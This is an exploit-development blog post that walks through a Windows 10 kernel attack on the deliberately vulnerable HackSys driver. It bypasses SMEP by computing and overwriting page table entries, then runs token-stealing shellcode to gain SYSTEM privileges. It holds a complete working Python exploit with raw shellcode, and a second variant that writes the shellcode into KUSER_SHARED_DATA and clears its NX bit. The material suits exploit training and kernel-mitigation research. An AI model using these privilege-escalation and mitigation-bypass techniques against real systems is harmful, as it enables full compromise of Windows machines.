
Executing the shellcode, results in manual bypass of SMEP!

Let’s refer back to the phraseology earlier in the post that uttered:

Why go to the mountain, if you can bring the mountain to you?

Notice how we didn’t “disable” SMEP like we did a few blog posts ago with ROP. All we did this time was just play by SMEP’s rules! We didn’t go to SMEP and try to disable it, instead, we brought our shellcode to SMEP and said “treat this as you normally treat kernel mode memory.”

This is great, we know we can bypass SMEP through this method! But the question remains, how can we achieve this dynamically?

After all, we cannot just arbitrarily use WinDbg when exploiting other systems.

Calculating PTEs

The previously shown method of bypassing SMEP manually in WinDbg revolved around the fact we could dereference the PTE address of our shellcode page in memory and extract the control bits. The question now remains, can we do this dynamically without a debugger?

Our exploit not only gives us the ability to arbitrarily write, but it gives us the ability to arbitrarily read in data as well! We will be using this read primitive to our advantage.

Windows has a function for just about anything! Fetching the PTE for an associated virtual address is no different. The kernel has an internal function called nt!MiGetPteAddress that applies a specific formula to retrieve the associated PTE of a memory page.

The above function performs the following instructions:

  1. Bitwise shifts the contents of the RCX register to the right by 9 bits
  2. Moves the value of 0x7FFFFFFFF8 into RAX
  3. Bitwise AND’s the values of RCX and RAX together
  4. Moves the value of 0xFFFFFE0000000000 into RAX
  5. Adds the values of RAX and RCX
  6. Performs a return out of the function

Let’s take a second to break this down by importance. First things first, the number 0xFFFFFE0000000000 looks like it could potentially be important- as it resembles a 64-bit virtual memory address.

Turns out, this is important. This number is actually a memory address, and it is the base address of all of the PTEs! Let’s talk about the base of the PTEs for a second and its significance.

Rebooting the machine and disassembling the function again, we notice something.

0xFFFFFE0000000000 has now changed to 0xFFFF800000000000. The base of the PTEs has changed, it seems.

This is due to page table randomization, a mitigation of Windows 10. Microsoft definitely had the right idea to implement this mitigation, but to be honest it is not of much use if the attacker already has an arbitrary read primitive.

An attacker needs an arbitrary read primitive in the first place to extract the contents of the PTE control bits by dereferencing the PTE of a given memory page.

If an attacker already has this ability, the adversary could just use the same primitive to read in nt!MiGetPteAddress+0x13, which, when dereferenced, contains the base of the PTEs.

Again, not ripping on Microsoft- I think they honestly have some of the best default OS exploit mitigations in the business. Just something I thought of.
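Why +0x13? The base of the PTEs is the 8-byte immediate of the second mov rax instruction, and the instructions in front of it add up to 0x13 bytes. The sketch below rebuilds the function body from the six steps listed earlier and pulls the immediate back out. The byte encodings are my own reconstruction from that list, not copied from the disassembly, and the helper name is made up.

```python
import struct

def build_mi_get_pte_address(pte_base):
    """Hypothetical helper: reassemble the function body for a given PTE base."""
    code  = b"\x48\xc1\xe9\x09"                             # shr rcx, 9              (4 bytes)
    code += b"\x48\xb8" + struct.pack("<Q", 0x7FFFFFFFF8)   # mov rax, 0x7FFFFFFFF8   (10 bytes)
    code += b"\x48\x23\xc8"                                 # and rcx, rax            (3 bytes)
    code += b"\x48\xb8" + struct.pack("<Q", pte_base)       # mov rax, <base of PTEs> (imm64 at +0x13)
    code += b"\x48\x03\xc1"                                 # add rax, rcx
    code += b"\xc3"                                         # ret
    return code

# One of the randomized bases seen in the disassembly above
code = build_mi_get_pte_address(0xFFFFFE0000000000)

# Reading a QWORD at offset 0x13 is what the arbitrary read does in the real exploit
leaked_base = struct.unpack_from("<Q", code, 0x13)[0]
print("[+] Base of PTEs: {0:016x}".format(leaked_base))
```

4 + 10 + 3 bytes of preceding instructions, plus the 2 opcode bytes of the mov itself, put the immediate at offset 0x13.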

The method of reusing an arbitrary read primitive is actually what we are going to do here! But before we do, let’s talk about the PTE formula one last time.

As we saw, a bitwise shift right operation is performed on the contents of the RCX register. That is because when this function is called, the virtual address for the PTE you would like to fetch gets loaded into RCX.

We can mimic this same behavior in Python also!

# Bitwise shift shellcode virtual address to the right 9 bits
shellcode_pte = shellcode_virtual_address >> 9

# Bitwise AND the bitwise shifted right shellcode virtual address with 0x7ffffffff8
shellcode_pte &= 0x7ffffffff8

# Add the base of the PTEs to the above value (which will need to be previously extracted with an arbitrary read)
shellcode_pte += base_of_ptes

The variable shellcode_pte will now contain the PTE for our shellcode page! We can demonstrate this behavior in WinDbg.
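The formula can be checked against the numbers from the manual WinDbg session earlier in this post, where the shellcode lived at 0xc60000 and its PTE at 0xFFFFF98000006300. The PTE base used below is not stated anywhere in the post; it is simply the value those two addresses imply, so treat it as an assumption. The function name is made up as well.

```python
def get_pte_address(virtual_address, base_of_ptes):
    """Hypothetical helper: same arithmetic as nt!MiGetPteAddress."""
    pte = virtual_address >> 9        # shr rcx, 9
    pte &= 0x7ffffffff8               # and rcx, 0x7FFFFFFFF8
    pte += base_of_ptes               # add rax, rcx
    return pte

# Assumed PTE base for that boot (inferred, not taken from a screenshot)
base_of_ptes = 0xFFFFF98000000000

shellcode_pte = get_pte_address(0xc60000, base_of_ptes)
print("[+] Shellcode PTE: {0:016x}".format(shellcode_pte))
```

0xc60000 shifted right by 9 is 0x6300, which is exactly the low part of the PTE address that was overwritten by hand in the debugger.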

Apologies for the poor quality of the screenshot above.

But as we can see, our version of the formula works, and we can now dynamically fetch a PTE address! The only question that remains is, how do we dynamically dereference nt!MiGetPteAddress+0x13 with an arbitrary read?

Read, Read, Read!

To use our arbitrary read, we are actually going to use our arbitrary write!

Our write-what-where primitive allows us to write a pointer (the what) to a pointer (the where). The school of thought here, is to write the address of nt!MiGetPteAddress+0x13 (the what) to a c_void_p() data type, which is Python’s representation of a C void pointer.

What will happen here is the following:

  1. Since the write portion of the write-what-where writes a POINTER (a.k.a the write will take a memory address and dereference it- which results in extracting the contents of a pointer), we will write the value of nt!MiGetPteAddress+0x13 somewhere we control. The write primitive will extract what nt!MiGetPteAddress+0x13 points to, which is the base of the PTEs, and write it somewhere we can fetch the result!
  2. The “where” value in the write-what-where vulnerability will write the “what” value (base of the PTEs) to a pointer (a.k.a if the “what” value (base of the PTEs) gets written to 0xFFFFFFFFFFFFFFFF, that means 0xFFFFFFFFFFFFFFFF will now POINT to the “what” value, which is the base of the PTEs).

The thought process here is, if we write the base of the PTEs to OUR OWN pointer that we create- we can then dereference our pointer and extract the contents ourselves!
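The idea can be tried out entirely in user mode, without the driver. In the sketch below, fake_write_what_where is a made-up stand-in for the vulnerable routine: it copies the QWORD that “what” points to into the location “where” points to. The “kernel” value is just a ctypes variable in our own process.

```python
import ctypes

def fake_write_what_where(what, where):
    """Stand-in for the driver bug: copies the QWORD at *what to *where."""
    ctypes.memmove(where, what, 8)

# Pretend this QWORD lives at nt!MiGetPteAddress+0x13
kernel_qword = ctypes.c_uint64(0xFFFFF98000000000)

# Our own storage, which receives the leaked value
leak_slot = ctypes.c_uint64(0)

fake_write_what_where(
    ctypes.addressof(kernel_qword),   # what: the address to read FROM
    ctypes.addressof(leak_slot)       # where: an address we own
)

print("[+] Leaked value: {0:016x}".format(leak_slot.value))
```

Pointing “what” at memory we cannot read and “where” at memory we own is all it takes to turn the write into a read.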

Here is how this all looks in Python!

First, we declare a structure (one member for the “what” value, one member for the “where” value)

# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

Secondly, we fetch the memory address of nt!MiGetPteAddress+0x13

Note- your offset from the kernel base to this function may be different!

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

Thirdly, we declare a c_void_p() to store the value pointed to by nt!MiGetPteAddress+0x13

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

Fourthly, we initialize our structure with our “what” value and our “where” value, so that the write copies what nt!MiGetPteAddress+0x13 points to (the base of the PTEs) into our declared pointer.

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

Notice the where is the address of the pointer addressof(base_of_ptes_pointer). This is because we don’t want to overwrite the c_void_p’s address with anything- we want to store the value inside of the pointer.

This will store the value inside of the pointer because our write-what-where primitive writes a “what” value to a pointer.

Next, we make an IOCTL call to the routine that jumps to the arbitrary write in the driver.

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

A little Python ctypes magic here on dereferencing pointers.

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

The above snippet of code will read in the c_void_p() (which contains the base of the PTEs) and store it in the variable base_of_ptes.
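As an aside, ctypes objects also expose their contents directly through .value, which avoids the round trip through struct. One gotcha worth knowing is that a c_void_p holding NULL reports None rather than 0. A small sketch, using c_uint64 and a made-up value so that it runs on any platform:

```python
import ctypes
import struct

# Stand-in for the slot the driver wrote the leaked QWORD into
slot = ctypes.c_uint64(0xFFFFF98000000000)

# Option 1: grab the raw bytes behind the ctypes object and unpack them
raw = ctypes.string_at(ctypes.addressof(slot), ctypes.sizeof(slot))
via_struct = struct.unpack("=Q", raw)[0]

# Option 2: let ctypes do the conversion
via_value = slot.value

print("{0:016x} {1:016x}".format(via_struct, via_value))

# A NULL c_void_p reports None, which matters if the leak silently failed
null_pointer = ctypes.c_void_p()
print(null_pointer.value)
```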

Utilizing the base of the PTEs, we can now dynamically retrieve the location of our shellcode’s PTE by putting all of the code together!

We have successfully defeated page table randomization!

Read, Read, Read… Again!

Now that we have dynamically resolved the PTE address for our shellcode, we need to use our arbitrary read again to dereference the shellcode’s PTE and extract the PTE control bits so we can modify the page table entry to be kernel mode.

Using the same primitive as above, we can use Python again to dynamically retrieve all of this!

Firstly, we need to create another structure (again, one member for “what” and one member for “where”).

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

Secondly, we declare another c_void_p.

shellcode_pte_bits_pointer = c_void_p()

Thirdly, we initialize our structure with the appropriate variables

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

We then make another call to the IOCTL responsible for the vulnerability.

Before executing our updated exploit, let’s restart the computer to prove everything is working dynamically.

Our combined code executes- resulting in the extraction of the PTE control bits!

Awesome! All that is left now is to modify the U/S bit of the PTE control bits and then execute our shellcode!

Write, Write, Write!

Now that we have read in all of the information we need, it is time to modify the PTE of the shellcode memory page. To do this, all we need to do is subtract 4 from the extracted PTE control bits.

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

Now that we have the value we would like to write over our current PTE, it is time to actually make the write.

To do this, we first setup a structure, just like the read primitive.

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

This time, however, we store the PTE bits in a pointer so when the write occurs, it writes the bits instead of trying to extract the memory address of 2000000046b0f867 - which is not a valid address.

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

Then, we initialize the structure again.

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

After everything is good to go, we make another IOCTL call to trigger the vulnerability, and we successfully turn our user mode page into a kernel mode page dynamically!
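The extra level of indirection is easy to get wrong, so here is a user mode sketch of it. As before, fake_write_what_where is a made-up stand-in for the vulnerable routine, and fake_pte is an ordinary variable playing the role of the real PTE.

```python
import ctypes

def fake_write_what_where(what, where):
    """Stand-in for the driver bug: copies the QWORD at *what to *where."""
    ctypes.memmove(where, what, 8)

# Stand-in for the shellcode page's PTE (user mode, U/S bit set)
fake_pte = ctypes.c_uint64(0x2000000046b0f867)

# The value we want to end up in the PTE has to live in memory of its own,
# because the primitive dereferences "what" instead of writing it directly
new_bits = ctypes.c_uint64(fake_pte.value - 4)

fake_write_what_where(
    ctypes.addressof(new_bits),   # what: pointer TO the new control bits
    ctypes.addressof(fake_pte)    # where: the PTE itself
)

print("[+] PTE is now: {0:016x}".format(fake_pte.value))
```

Passing the control bits themselves as “what” would make the routine treat 0x2000000046b0f863 as an address to read from, which is the invalid dereference described above.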

Goodbye, SMEP (v2 ft. PTE Overwrite)!

All that is left to do now is execute our shellcode via nt!HalDispatchTable+0x8 and nt!KeQueryIntervalProfile(). Since I have already done a post outlining how this works, I will link you to it so you can see how this actually executes our shellcode. This blog post assumes the reader has minimal knowledge of arbitrary memory overwrites to begin with.

Here is the final exploit, which can also be found on my GitHub.

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# Windows 10 RS1 - SMEP Bypass via PTE Overwrite
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Fourth structure, to overwrite HalDispatchTable + 0x8 with kernel mode shellcode page
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

# Token stealing payload
payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xF0\x02\x00\x00"                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
    "\x48\x81\xEB\xF0\x02\x00\x00"                      # sub rbx,0x2f0       ; Go back to current process
    "\x48\x8B\x8B\xE8\x02\x00\x00"                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x31\xC0"                                      # xor rax,rax         ; set NTSTATUS SUCCESS
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying the shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Print update statement for shellcode location
print "[+] Shellcode is located at {0}".format(hex(ptr))

# Creating a pointer for the shellcode (write-what-where writes a pointer to a pointer)
# Using addressof(shellcode_pointer) in Write-what-where structure #5
shellcode_pointer = c_void_p(ptr)

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[-] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate the shellcode's PTE address

# Calculating the PTE for shellcode memory page
shellcode_pte = ptr >> 9
shellcode_pte &= 0x7ffffffff8
shellcode_pte += base_of_ptes

# Print update for Shellcode PTE
print "[+] PTE for the shellcode memory page is located at {0}".format(hex(shellcode_pte))

# Phase 3: Extract shellcode's PTE control bits

# Declaring C void pointer to store shellcode PTE control bits
shellcode_pte_bits_pointer = c_void_p()

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
shellcode_pte_control_bits_usermode = struct.unpack('<Q', shellcode_pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for shellcode memory page: {:016x}".format(shellcode_pte_control_bits_usermode)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Goodbye SMEP..."
print "[+] Overwriting shellcodes PTE user control bit with a supervisor control bit..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] User mode shellcode page is now a kernel mode page!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f1330

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Write-what-where structure #5
www = WriteWhatWhere()
www.What = addressof(shellcode_pointer)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM!

Rinse and Repeat

Did you think I forgot about you, kernel no-execute (NX)?

Let’s say that for some reason, you are against the method of allocating user mode code. There are many reasons for that, one of them being EDR hooking of crucial functions like VirtualAlloc().

Let’s say you want to take advantage of various defensive tools and their lack of visibility into kernel mode. How can we leverage already existing kernel mode memory in the same manner?

Okay, This Time We Are Going To The Mountain! KUSER_SHARED_DATA Time!

Morten, in his research, suggests that another suitable method may be to utilize the KUSER_SHARED_DATA structure in the kernel directly, similarly to how ROP works in user mode.

The idea behind ROP in user mode is that we have the ability to write shellcode to the stack, but we do not have the ability to execute it. Using ROP, we can change the permissions of the stack to executable, and execute our shellcode from there.

The concept here is no different. We can write our shellcode to KUSER_SHARED_DATA+0x800, because it is a kernel mode page with writeable permissions.

Using our write and read primitives, we can then flip the NX bit (similar to ROP in user mode) and make the kernel mode memory executable!

The question still remains, why KUSER_SHARED_DATA?

Static Electricity

Windows has slowly but surely dried up all of the static addresses used by exploit developers over the years. One of the last that many people relied on for kASLR bypasses was the HAL heap, which was not randomized. The HAL heap used to contain a pointer into the kernel AND sit at a static address, but it is no longer static.

Although nearly everything is now dynamically based, one structure still remains static: KUSER_SHARED_DATA.

This structure, according to Geoff Chappell, is used to define the layout of data that the kernel shares with user mode.

The issue is, this structure is static at the address 0xFFFFF78000000000!

What is even more interesting, is that KUSER_SHARED_DATA+0x800 seems to just be a code cave of non-executable kernel mode memory which is writeable!

How Do We Leverage This?

Our arbitrary write primitive only allows us to write one QWORD of data at a time (8 bytes). My thought process here is to:

  1. Break up the 67 byte shellcode into 8 byte pieces and pad the final piece with NULL bytes.
  2. Write each piece of shellcode to KUSER_SHARED_DATA+0x800, KUSER_SHARED_DATA+0x808, KUSER_SHARED_DATA+0x810, etc.
  3. Use the same read primitive to bypass page table randomization and obtain PTE control bits of KUSER_SHARED_DATA+0x800.
  4. Make KUSER_SHARED_DATA+0x800 executable by overwriting the PTE.
  5. NT AUTHORITY\SYSTEM
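Step 3 depends on the PTE address calculation performed by nt!MiGetPteAddress. Here is a minimal sketch of that arithmetic in plain Python, with no driver interaction. The name `ASSUMED_PTE_BASE` and its value are assumptions for illustration only: it is the old static base used before page table randomization, whereas on RS1 and later the real base has to be leaked from nt!MiGetPteAddress+0x13 as described earlier in the post.

```python
# Sketch of the shift / mask / add that nt!MiGetPteAddress performs.
KUSER_SHARED_DATA = 0xFFFFF78000000000

# Assumption for illustration: the pre-randomization PTE base.
# On a randomized system this value must be leaked at runtime.
ASSUMED_PTE_BASE = 0xFFFFF68000000000


def pte_address(virtual_address, pte_base):
    """Return the address of the PTE that maps virtual_address."""
    # Shifting right by 9 divides by the 4 KB page size and multiplies by the
    # 8 byte PTE size; the mask keeps the result 8 byte aligned and in range.
    return ((virtual_address >> 9) & 0x7FFFFFFFF8) + pte_base


target = KUSER_SHARED_DATA + 0x800
print("PTE for 0x{0:016X} is at 0x{1:016X}".format(
    target, pte_address(target, ASSUMED_PTE_BASE)))
```

Because both KUSER_SHARED_DATA and KUSER_SHARED_DATA+0x800 sit on the same 4 KB page, they resolve to the same PTE.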

Before we begin, the steps about obtaining the contents of nt!MiGetPteAddress+0x13 and extracting the PTE control bits will be left out in this portion of the blog, as they have already been explained in the beginning of this post!

Moving on, let’s start with each line of shellcode.

For each line written, the data type chosen was c_ulonglong(), as its address is easy to store in a c_void_p.

The first line of shellcode had an associated structure as shown below.

class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

Shellcode is declared as a c_ulonglong().

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

The shellcode is then written to KUSER_SHARED_DATA+0x800 through the previously created structure.

www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

This same process was repeated for each of the 9 QWORDs, until all of the shellcode was written.
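The splitting itself can be checked offline. The sketch below takes the 67 byte token stealing payload listed in this post, pads it to a multiple of 8 bytes, and unpacks it as little-endian QWORDs. The helper name `to_qwords` is hypothetical and is not part of the original exploit, which hard-codes each value by hand.

```python
import struct

# The 67 byte token stealing payload from this post.
shellcode = (
    b"\x65\x48\x8B\x04\x25\x88\x01\x00\x00"  # mov rax,[gs:0x188]
    b"\x48\x8B\x80\xB8\x00\x00\x00"          # mov rax,[rax+0xb8]
    b"\x48\x89\xC3"                          # mov rbx,rax
    b"\x48\x8B\x9B\xF0\x02\x00\x00"          # mov rbx,[rbx+0x2f0]
    b"\x48\x81\xEB\xF0\x02\x00\x00"          # sub rbx,0x2f0
    b"\x48\x8B\x8B\xE8\x02\x00\x00"          # mov rcx,[rbx+0x2e8]
    b"\x48\x83\xF9\x04"                      # cmp rcx,byte +0x4
    b"\x75\xE5"                              # jnz 0x13
    b"\x48\x8B\x8B\x58\x03\x00\x00"          # mov rcx,[rbx+0x358]
    b"\x80\xE1\xF0"                          # and cl,0xf0
    b"\x48\x89\x88\x58\x03\x00\x00"          # mov [rax+0x358],rcx
    b"\x48\x31\xC0"                          # xor rax,rax
    b"\xC3"                                  # ret
)


def to_qwords(payload):
    """Pad payload with NULL bytes to a multiple of 8 and split into QWORDs."""
    padded = payload + b"\x00" * (-len(payload) % 8)
    return [struct.unpack_from("<Q", padded, offset)[0]
            for offset in range(0, len(padded), 8)]


qwords = to_qwords(shellcode)
for i, qword in enumerate(qwords):
    print("KUSER_SHARED_DATA + 0x{0:03X}: 0x{1:016X}".format(0x800 + 8 * i, qword))
```

The values produced match the c_ulonglong() constants used in the full exploit, from 0x00018825048B4865 for the first write through 0x0000000000C3C031 for the last.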

As you can see in the image below, the shellcode was successfully written to KUSER_SHARED_DATA+0x800 due to the writeable PTE control bit of this structure.

Executable, Please!

Using the same arbitrary read primitives as earlier, we can extract the PTE control bits of KUSER_SHARED_DATA+0x800’s memory page. This time, however, instead of subtracting 4, we are going to use a bitwise AND, per Morten’s research.

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute = pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

We can see that dynamically, we can set KUSER_SHARED_DATA+0x800 to executable memory, giving us a nice big executable kernel memory region!
